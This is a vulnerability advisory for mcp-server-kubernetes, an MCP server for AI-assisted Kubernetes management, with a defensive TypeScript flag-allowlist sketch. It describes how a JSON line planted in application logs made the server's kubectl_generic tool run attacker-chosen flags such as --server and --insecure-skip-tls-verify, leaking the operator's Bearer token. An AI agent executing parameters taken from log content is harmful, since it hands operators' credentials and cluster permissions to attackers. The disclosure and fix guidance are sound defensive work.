Impact
mcp-server-kubernetes, a Model Context Protocol server for Kubernetes cluster management, was found to pass user-supplied flags directly to kubectl without an allowlist. Prior to version 3.7.0, this flaw allowed an attacker with limited cluster access, such as a developer with pod-deployment permissions, to inject a single structured JSON line into application logs. When a privileged operator reads those logs with the MCP server, kubectl_generic executes the injected flags (e.g., --server=https://attacker.example.com and --insecure-skip-tls-verify=true), sending all API requests, including the Bearer token from the operator's kubeconfig, to the attacker's endpoint. The captured token can then be replayed against the real Kubernetes API, granting the attacker the full RBAC permissions of the operator's service account. This flaw is an example of CWE-88. The issue is fixed in release 3.7.0.
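The missing control described above is a flag allowlist applied before kubectl is invoked. The sketch below is an added example, not the project's code or its 3.7.0 fix; the names `ALLOWED_FLAGS`, `SAFE_VALUE` and `checkFlags` and the choice of permitted flags are assumptions made for illustration.

```typescript
// Added example: hypothetical allowlist check for flags handed to a kubectl wrapper.
type FlagValue = string | number | boolean;

// Assumed policy: only flags needed for read-style calls such as logs/get.
// Connection and credential flags (--server, --insecure-skip-tls-verify,
// --kubeconfig, --token, ...) are absent, so they can never reach kubectl.
const ALLOWED_FLAGS: ReadonlyArray<string> = [
  "namespace", "container", "tail", "since", "previous",
  "timestamps", "selector", "output", "all-namespaces",
];

// Values must start alphanumeric and contain no whitespace or shell metacharacters.
const SAFE_VALUE = /^[A-Za-z0-9][A-Za-z0-9._=,:\/-]*$/;

interface FlagCheck {
  ok: boolean;
  argv: string[];     // flags safe to append to the kubectl argument vector
  rejected: string[]; // flag names that failed the check, for logging and alerting
}

function checkFlags(flags: Record<string, FlagValue>): FlagCheck {
  const argv: string[] = [];
  const rejected: string[] = [];
  for (const rawName of Object.keys(flags)) {
    const name = rawName.replace(/^-+/, ""); // accept "tail" and "--tail" alike
    const text = String(flags[rawName]);
    if (ALLOWED_FLAGS.indexOf(name) === -1 || !SAFE_VALUE.test(text)) {
      rejected.push(rawName);
      continue;
    }
    // The --name=value form keeps the value from being parsed as a separate flag.
    argv.push(`--${name}=${text}`);
  }
  // Fail closed: one bad flag rejects the whole request rather than being dropped.
  return rejected.length === 0
    ? { ok: true, argv, rejected }
    : { ok: false, argv: [], rejected };
}

// Constructed input: a log-read request carrying the injected flags from the advisory.
const injected = checkFlags({
  tail: 100,
  server: "https://attacker.example.com",
  "--insecure-skip-tls-verify": true,
});
console.log(injected.ok, injected.rejected);
```

The returned `argv` is meant for an exec-style call that takes an argument array, not for concatenation into a shell string.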
Affected Systems
Flux159's mcp-server-kubernetes versions 3.6.x and earlier are affected. The issue was fixed in release 3.7.0. The vulnerability impacts Kubernetes cluster environments where the MCP server is used for cluster management and operators have the ability to read logs produced by applications.
Risk and Exploitability
The CVSS score of 6.1 indicates a moderate severity. The EPSS score is not available and the vulnerability is not listed in the CISA KEV catalog. Exploitation requires an attacker to already possess limited cluster or codebase access (such as a developer with pod-deployment permissions) and the ability to inject a JSON line into application logs. The attacker must also rely on a privileged operator reading those logs, which is an additional prerequisite. Given the requirement for preexisting access and the lack of a publicly known exploit, the risk is moderate but still significant for environments with permissive log access or insufficient controls on who can read logs and empower the MCP server.